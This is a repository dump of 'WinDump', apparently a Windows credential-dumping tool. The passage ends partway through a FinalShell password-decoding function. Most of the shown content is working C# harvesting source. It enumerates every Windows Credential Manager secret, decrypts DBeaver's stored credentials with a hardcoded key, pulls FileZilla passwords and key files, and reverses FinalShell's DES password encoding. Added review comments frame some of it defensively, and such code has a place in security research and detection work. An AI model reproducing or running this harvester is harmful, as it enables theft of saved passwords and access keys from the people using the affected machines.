├── .gitattributes ├── .github └── workflows │ └── build.yml ├── .gitignore ├── Cred ├── BrowserChromiumBased.cs ├── Credential.cs ├── DBeaver.cs ├── FileZilla.cs ├── FinalShell.cs ├── MobaXterm.cs ├── Navicat.cs ├── OpenVPN.cs ├── Putty.cs ├── RDP.cs ├── SecureCRT.cs ├── TightVNC.cs ├── UltraVNC.cs ├── WinSCP.cs └── XManager.cs ├── Directories.cs ├── Files.cs ├── LICENSE.txt ├── Network ├── DNSCache.cs ├── Interface.cs ├── Netstat.cs ├── Route.cs └── WIFI.cs ├── Process.cs ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── README.md ├── Resource.Designer.cs ├── Resource.resx ├── Resources ├── index.html └── index.html.gz ├── SystemInfo.cs ├── User.cs ├── Utils.cs ├── WinDump.csproj ├── WinDump.sln ├── av ├── README.md ├── auto.json ├── out.txt └── todotnet.py └── windump.png /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). 
Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.github/workflows/build.yml:
--------------------------------------------------------------------------------
     # Release workflow: a pushed tag matching v*.*.* builds WinDump.sln in Release
     # configuration on a Windows runner and uploads ./bin/Release/WinDump.exe to a
     # GitHub release.
1 | name: Build
2 |
3 | on:
4 |   push:
5 |     tags:
6 |       - "v*.*.*"
7 |
     # NOTE(review): no `permissions:` key is declared, so every step runs with the
     # repository's default GITHUB_TOKEN scope. Only the Release step needs write
     # access (`contents: write`); declaring that explicitly keeps the build steps
     # read-only.
8 | jobs:
9 |   build:
10 |     runs-on: windows-latest
11 |
12 |     steps:
     # NOTE(review): all three actions below are referenced by a mutable tag (@v4, @v1).
     # A tag can be moved to different code after review; pinning each `uses:` to a full
     # commit SHA fixes exactly what runs in the job that publishes the release binary.
13 |       - uses: actions/checkout@v4
14 |
15 |       - name: Setup MSBuild
16 |         uses: microsoft/setup-msbuild@v1
17 |
18 |       - name: Build solution
19 |         run: msbuild WinDump.sln /p:Configuration=Release
20 |
     # The `if:` repeats the tag filter of the trigger above, so with the current `on:`
     # block it is always true. The uploaded artifact is unsigned and no checksum is
     # published alongside it.
21 |       - name: Release
22 |         uses: softprops/action-gh-release@v1
23 |         if: startsWith(github.ref, 'refs/tags/')
24 |         with:
25 |           files: ./bin/Release/WinDump.exe
26 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 
118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. 
Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger 
configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/Cred/Credential.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data;
4 | using System.IO;
5 | using System.Runtime.InteropServices;
6 | using System.Security;
7 | using System.Security.Cryptography;
8 | using System.Text;
9 |
10 | namespace WinDump
11 | {
     // P/Invoke wrapper around the Windows Credential Manager enumeration API
     // (advapi32!CredEnumerate / CredFree).
12 |     internal class Credential
13 |     {
         // Returns a Target/User/Pwd table built from the entries CredEnumerate hands back
         // to the calling process. The call passes a null filter and flag 1, which is
         // CRED_ENUMERATE_ALL_CREDENTIALS in wincred.h. When CredEnumerate returns false the
         // table is returned empty and the Win32 error is not inspected.
         // Defensive relevance: this is the documented API, so the call by itself is not
         // anomalous; which process enumerates the whole credential set is the useful signal.
14 |         internal static DataTable GetCred()
15 |         {
16 |             var dt = new DataTable();
17 |             dt.Columns.Add("Target");
18 |             dt.Columns.Add("User");
19 |             dt.Columns.Add("Pwd");
20 |             if (CredEnumerate(null, 1, out int count, out IntPtr pCredentials))
21 |             {
22 |                 for (int i = 0; i < count; i++)
23 |                 {
                     // pCredentials is read as an array of `count` pointers, one per entry.
24 |                     IntPtr credential = Marshal.ReadIntPtr(pCredentials, i * IntPtr.Size);
25 |                     if (credential != IntPtr.Zero)
26 |                     {
27 |                         CREDENTIAL cred = (CREDENTIAL)Marshal.PtrToStructure(credential, typeof(CREDENTIAL));
28 |
29 |                         string targetName = cred.TargetName;
30 |                         string userName = cred.UserName;
31 |                         string password = string.Empty;
32 |
                         // An entry with no blob keeps the empty string.
33 |                         if (cred.CredentialBlob != IntPtr.Zero && cred.CredentialBlobSize > 0)
34 |                         {
35 |                             byte[] passwordBytes = new byte[cred.CredentialBlobSize];
36 |                             Marshal.Copy(cred.CredentialBlob, passwordBytes, 0, (int)cred.CredentialBlobSize);
                             // The blob is always decoded as text, with the encoding picked by the
                             // heuristic below. NOTE(review): a blob that is not text would come out
                             // as garbage; Type is not consulted here.
37 |                             if (LooksLikeUTF16LE(passwordBytes))
38 |                             {
39 |                                 password = Encoding.Unicode.GetString(passwordBytes);
40 |                             }
41 |                             else
42 |                             {
43 |
44 |                                 password = Encoding.UTF8.GetString(passwordBytes);
45 |                             }
46 |                         }
47 |
48 |                         dt.Rows.Add(targetName, userName, password);
49 |                     }
50 |                 }
51 |
                 // Releases the buffer CredEnumerate allocated. The managed copies of the
                 // secrets (byte[] and string) are not cleared.
52 |                 CredFree(pCredentials);
53 |             }
54 |
55 |             return dt;
56 |         }
         // Heuristic: counts zero bytes at odd offsets and reports true when they make up at
         // least half of data.Length / 2 (integer division) byte pairs.
         // For fewer than two bytes the divisor is 0; zeros is also 0, the float division
         // yields NaN, and the comparison is false.
57 |         internal static bool LooksLikeUTF16LE(byte[] data)
58 |         {
59 |             int zeros = 0;
60 |             for (int i = 1; i < data.Length; i += 2)
61 |             {
62 |                 if (data[i] == 0x00)
63 |                     zeros++;
64 |             }
65 |
66 |             float ratio = (float)zeros / (data.Length / 2);
67 |             return ratio >= 0.5; // more than half of the high bytes are 0, so this is probably UTF-16LE
68 |         }
         // Values are implicit after Generic = 1, i.e. DomainPassword = 2 ... Maximum = 7.
69 |         private enum CredentialType : uint
70 |         {
71 |             Generic = 1,
72 |             DomainPassword,
73 |             DomainCertificate,
74 |             DomainVisiblePassword,
75 |             GenericCertificate,
76 |             DomainExtended,
77 |             Maximum,
78 |             MaximumEx = Maximum + 1000,
79 |         }
         // Managed layout used to marshal one native credential record (sequential layout,
         // Unicode strings). TargetAlias is kept as a raw pointer and never read in this file.
80 |         [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
81 |         private struct CREDENTIAL
82 |         {
83 |             public uint Flags;
84 |             public CredentialType Type;
85 |             [MarshalAs(UnmanagedType.LPWStr)]
86 |             public string TargetName;
87 |             [MarshalAs(UnmanagedType.LPWStr)]
88 |             public string Comment;
89 |             public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten;
90 |             public uint CredentialBlobSize;
91 |             public IntPtr CredentialBlob;
92 |             public uint Persist;
93 |             public uint AttributeCount;
94 |             public IntPtr Attributes;
95 |             public IntPtr TargetAlias;
96 |             [MarshalAs(UnmanagedType.LPWStr)]
97 |             public string UserName;
98 |         }
99 |
100 |         [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
101 |         private static extern bool CredEnumerate(string filter, int flag, out int count, out IntPtr pCredentials);
102 |
103 |         [DllImport("advapi32.dll", SetLastError = true)]
104 |         private static extern void CredFree(IntPtr cred);
105 |
106 |
107 |     }
108 |
109 | }
110 |
--------------------------------------------------------------------------------
/Cred/DBeaver.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using
System.IO;
4 | using System.Security.Cryptography;
5 | using System.Text;
6 |
7 | namespace WinDump
8 | {
     // Reads DBeaver's per-user connection definitions and the accompanying credentials file.
9 |     internal class DBeaver
10 |     {
         // Decrypts the file at filePath with Rijndael in CBC mode and PKCS7 padding, using
         // the caller-supplied key and IV, and returns the plaintext as UTF-8 text.
         // The first 16 decrypted bytes are read into `skip` and thrown away. Presumably the
         // file starts with a 16-byte IV: in CBC a wrong IV corrupts only the first plaintext
         // block, so decrypting with any IV and discarding block 0 recovers the rest -
         // confirm against the file format.
         // NOTE(review): the return value of Read is ignored, so a short read is not detected.
         // Throws on I/O failure or bad padding; the only visible caller swallows that.
11 |         internal static string Decrypt(string filePath, byte[] key, byte[] iv)
12 |         {
13 |             byte[] encryptedBytes = File.ReadAllBytes(filePath);
14 |
15 |             using (var aes = new RijndaelManaged())
16 |             {
17 |                 aes.Key = key;
18 |                 aes.IV = iv;
19 |                 aes.Mode = CipherMode.CBC;
20 |                 aes.Padding = PaddingMode.PKCS7;
21 |
22 |                 using (MemoryStream memoryStream = new MemoryStream(encryptedBytes))
23 |                 {
24 |                     using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
25 |                     {
26 |                         var skip = new byte[16];
27 |                         cryptoStream.Read(skip, 0, 16);
28 |                         using (StreamReader streamReader = new StreamReader(cryptoStream, Encoding.UTF8))
29 |                         {
30 |                             return streamReader.ReadToEnd();
31 |                         }
32 |                     }
33 |                 }
34 |             }
35 |         }
         // Returns the text of data-sources.json followed by a newline and the decrypted
         // credentials-config.json, both taken from
         // %APPDATA%\DBeaverData\workspace6\General\.dbeaver. Returns "" when the DBeaverData
         // directory does not exist; a missing file or a failed decryption contributes an
         // empty string.
         // Security note: the 16-byte key is a constant compiled into this file and the IV is
         // all zeroes, so nothing user-specific takes part in the decryption. The credentials
         // file is therefore obfuscated rather than protected against any process that can
         // read the profile; file ACLs and monitoring of reads of these two paths by
         // processes other than DBeaver are the controls that matter.
36 |         internal static string GetDBeaver()
37 |         {
38 |             var path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DBeaverData");
39 |             if (!Directory.Exists(path))
40 |             {
41 |                 return "";
42 |             }
43 |             var sourcePath = Path.Combine(path, "workspace6\\General\\.dbeaver\\data-sources.json");
44 |             var sources = "";
45 |             if (File.Exists(sourcePath)) {
46 |                 sources = File.ReadAllText(sourcePath);
47 |             }
48 |             var credsPath = Path.Combine(path, "workspace6\\General\\.dbeaver\\credentials-config.json");
49 |             var creds = "";
50 |             if (File.Exists(credsPath))
51 |             {
52 |                 // "babb4a9f774ab853c96c2d653dfe544a", "00000000000000000000000000000000"
53 |                 var key = new byte[] { 0xBA, 0xBB, 0x4A, 0x9F, 0x77, 0x4A, 0xB8, 0x53, 0xC9, 0x6C, 0x2D, 0x65, 0x3D, 0xFE, 0x54, 0x4A };
54 |                 var iv = new byte[16];
55 |                 try
56 |                 {
57 |                     creds = Decrypt(credsPath, key, iv);
58 |                 }
                 // Any failure (I/O, padding) is swallowed and leaves creds empty.
59 |                 catch { }
60 |             }
61 |             return sources + "\n" + creds;
62 |         }
63 |     }
64 | }
65 |
--------------------------------------------------------------------------------
/Cred/FileZilla.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data;
4 | using System.IO;
5 | using System.Text;
6 | using System.Xml;
7 |
8 | namespace WinDump
9 | {
     // Reads saved-server entries from FileZilla's per-user XML files.
10 |     internal class FileZilla
11 |     {
         // Builds a Name/Proto/Host/Port/Username/"Pwd/Key" table from
         // %APPDATA%\FileZilla\recentservers.xml and %APPDATA%\FileZilla\sitemanager.xml.
         // Files.DumpFile is defined elsewhere; here its result is used as the file text and
         // `ok` as a success flag. Parse errors are swallowed per file, so rows added before
         // the failure stay in the table.
         // Defensive relevance: reads of these two files by a process other than FileZilla
         // are the observable event.
12 |         internal static DataTable GetFileZilla()
13 |         {
14 |             var dt = new DataTable();
15 |             dt.Columns.Add("Name");
16 |             dt.Columns.Add("Proto");
17 |             dt.Columns.Add("Host");
18 |             dt.Columns.Add("Port");
19 |             dt.Columns.Add("Username");
20 |             dt.Columns.Add("Pwd/Key");
21 |             var data = Files.DumpFile(@"%APPDATA%\FileZilla\recentservers.xml", out bool ok);
22 |             if (ok)
23 |             {
24 |                 try
25 |                 {
26 |
27 |                     Parse(dt, data, "/FileZilla3/RecentServers");
28 |                 }
29 |                 catch { }
30 |             }
31 |             data = Files.DumpFile(@"%APPDATA%\FileZilla\sitemanager.xml", out ok);
32 |             if (ok)
33 |             {
34 |                 try
35 |                 {
36 |
37 |                     Parse(dt, data, "/FileZilla3/Servers");
38 |                 }
39 |                 catch { }
40 |             }
41 |             return dt;
42 |         }
         // Loads `data` as XML, selects the nodes at `xpath` and adds one row per child
         // (server) element, filled from that element's own children.
         // NOTE(review): the field variables are declared outside the per-server loop, so a
         // server element that lacks a field inherits the value of the previous one.
43 |         internal static void Parse(DataTable dt, string data, string xpath)
44 |         {
45 |             var xmlDoc = new XmlDocument();
46 |             xmlDoc.LoadXml(data);
47 |             foreach (XmlNode node in xmlDoc.SelectNodes(xpath))
48 |             {
49 |                 string host = string.Empty;
50 |                 string port = string.Empty;
51 |                 string username = string.Empty;
52 |                 string pwdkey = string.Empty;
53 |                 string proto = string.Empty;
54 |                 string name = string.Empty;
55 |                 foreach (XmlNode serverNode in node.ChildNodes)
56 |                 {
57 |                     foreach (XmlNode itemNode in serverNode.ChildNodes)
58 |                         switch (itemNode.Name)
59 |                         {
60 |                             case "Name":
61 |                                 name = itemNode.InnerText;
62 |                                 break;
63 |                             case "Host":
64 |                                 host = itemNode.InnerText;
65 |                                 break;
66 |                             case "Port":
67 |                                 port = itemNode.InnerText;
68 |                                 break;
69 |                             case "User":
70 |                                 username = itemNode.InnerText;
71 |                                 break;
72 |                             case "Pass":
                                 // Any attribute on <Pass> is taken to mean the text is base64
                                 // (presumably encoding="base64" - the attribute name is not
                                 // checked). Base64 is an encoding, not encryption.
73 |                                 pwdkey = itemNode.InnerText;
74 |                                 if (itemNode.Attributes.Count != 0)
75 |                                 {
76 |                                     pwdkey = Encoding.UTF8.GetString(Convert.FromBase64String(pwdkey));
77 |                                 }
78 |                                 break;
79 |                             case "Keyfile":
                                 // The element holds a path; when the file exists its whole
                                 // content replaces any password read for this entry.
80 |                                 var keypath = itemNode.InnerText;
81 |                                 if (File.Exists(keypath))
82 |                                 {
83 |                                     pwdkey = File.ReadAllText(keypath);
84 |                                 }
85 |                                 break;
86 |                             case "Protocol":
                                 // Only the values "0" and "1" are mapped; everything else
                                 // is reported with the literal below.
87 |                                 switch (itemNode.InnerText)
88 |                                 {
89 |                                     case "0":
90 |                                         proto = "ftp";
91 |                                         break;
92 |                                     case "1":
93 |                                         proto = "sftp";
94 |                                         break;
95 |                                     default:
96 |                                         proto = "unknow";
97 |                                         break;
98 |                                 }
99 |                                 break;
100 |                         }
101 |                     dt.Rows.Add(name, proto, host, port, username, pwdkey);
102 |                 }
103 |
104 |             }
105 |
106 |         }
107 |     }
108 | }
109 |
--------------------------------------------------------------------------------
/Cred/FinalShell.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data;
4 | using System.IO;
5 | using System.Security.Cryptography;
6 | using System.Text;
7 | using System.Text.RegularExpressions;
8 | namespace WinDump
9 | {
     // Reads FinalShell connection files and reverses the password encoding they use.
10 |     internal class FinalShell
11 |     {
         // Fields are pulled out of the JSON text with regular expressions instead of a JSON
         // parser, so each pattern depends on the exact key/value spacing shown and takes the
         // first match in the file.
12 |         static readonly Regex reUser = new Regex("\"user_name\":\"(.*?)\"", RegexOptions.Compiled);
13 |         static readonly Regex rePwd = new Regex("\"password\":\"(.*?)\"", RegexOptions.Compiled);
14 |         static readonly Regex reHost = new Regex("\"host\":\"(.*?)\"", RegexOptions.Compiled);
15 |         static readonly Regex rePort = new Regex("\"port\":(.*?),", RegexOptions.Compiled);
16 |         static readonly Regex reKey = new Regex("\"secret_key_id\":\"(.*?)\"", RegexOptions.Compiled);
17 |         static readonly Regex reKeyList = new Regex("\"id\":\"(.*?)\",\"key_data\":\"(.*?)\"", RegexOptions.Compiled);
         // Builds a Host/Port/User/Pwd/KeyID table, one row per *.json file under
         // %LOCALAPPDATA%\finalshell\conn. Returns the empty table when the directory is
         // missing. NOTE(review): DecodePass is not wrapped in try/catch, so one malformed
         // password value aborts the whole enumeration.
18 |         internal static DataTable GetFinalShell()
19 |         {
20 |             DataTable dt = new DataTable();
21 |             dt.Columns.Add("Host");
22 |             dt.Columns.Add("Port");
23 |             dt.Columns.Add("User");
24 |             dt.Columns.Add("Pwd");
25 |             dt.Columns.Add("KeyID");
26 |             string connPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\finalshell\conn";
27 |             if (!Directory.Exists(connPath))
28 |             {
29 |                 return dt;
30 |             }
31 |             foreach (var file in Directory.GetFiles(connPath, "*.json"))
32 |             {
33 |                 var json = File.ReadAllText(file);
34 |                 var user = GetGroup(reUser, json);
35 |                 var pwd = DecodePass(GetGroup(rePwd, json));
36 |                 var host = GetGroup(reHost, json);
37 |                 var port = GetGroup(rePort, json);
38 |                 var keyid = GetGroup(reKey, json);
39 |                 dt.Rows.Add(host, port, user, pwd, keyid);
40 |             }
41 |             return dt;
42 |         }
         // Builds a KeyID/Content table from every "id"/"key_data" pair matched in
         // %LOCALAPPDATA%\finalshell\config.json; key_data is base64-decoded to UTF-8 text.
         // Returns the empty table when the file is missing.
43 |         internal static DataTable GetFinalShellKey()
44 |         {
45 |             DataTable dt = new DataTable();
46 |             dt.Columns.Add("KeyID");
47 |             dt.Columns.Add("Content");
48 |             string configPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\finalshell\config.json";
49 |             if (!File.Exists(configPath))
50 |             {
51 |                 return dt;
52 |             }
53 |             var mc = reKeyList.Matches(File.ReadAllText(configPath));
54 |             foreach (Match m in mc)
55 |             {
56 |                 var key = Encoding.UTF8.GetString(Convert.FromBase64String(m.Groups[2].Value));
57 |                 dt.Rows.Add(m.Groups[1], key);
58 |             }
59 |             return dt;
60 |
61 |         }
         // Returns capture group 1 of the first match of `re` in `text`, or "" when there is
         // no match.
62 |         internal static string GetGroup(Regex re, string text)
63 |         {
64 |             var m = re.Match(text);
65 |             if (m.Success)
66 |             {
67 |                 return m.Groups[1].Value;
68 |             }
69 |             return "";
70 |         }
         // Decrypts `data` with single DES (DESCryptoServiceProvider) and an all-zero IV; the
         // key is the first 8 bytes of `head`. Despite its name, TripleDesIV is used with
         // DES, not 3DES. Mode and padding are left at the provider defaults.
71 |         internal static byte[] desDecode(byte[] data, byte[] head)
72 |         {
73 |             byte[] TripleDesIV = { 0, 0, 0, 0, 0, 0, 0, 0 };
74 |             byte[] key = new byte[8];
75 |             Array.Copy(head, key, 8);
76 |             DESCryptoServiceProvider des = new DESCryptoServiceProvider();
77 |             des.Key = key;
78 |             des.IV = TripleDesIV;
79 |             MemoryStream ms = new MemoryStream();
80 |             CryptoStream cs = new CryptoStream(ms, des.CreateDecryptor(), CryptoStreamMode.Write);
81 |             cs.Write(data, 0, data.Length);
82 |             cs.FlushFinalBlock();
83 |             return ms.ToArray();
84 |         }
85 |
         // Decodes one stored password: base64-decode, split off the first 8 bytes as a
         // header, derive the DES key from that header with ranDomKey, decrypt the remainder
         // and return it as UTF-8. An empty input is returned unchanged.
         // Security note: the key depends only on the header stored next to the ciphertext
         // and on constants in this file, so no user secret is involved - the stored value is
         // obfuscated, not protected.
         // NOTE(review): input shorter than 8 bytes after decoding, or invalid base64, throws.
86 |         internal static string DecodePass(string data)
87 |         {
88 |             if (data.Length == 0)
89 |             {
90 |                 return data;
91 |             }
92 |             else
93 |             {
94 |                 byte[] buf = Convert.FromBase64String(data);
95 |                 byte[] head = new byte[8];
96 |                 Array.Copy(buf, 0, head, 0, head.Length);
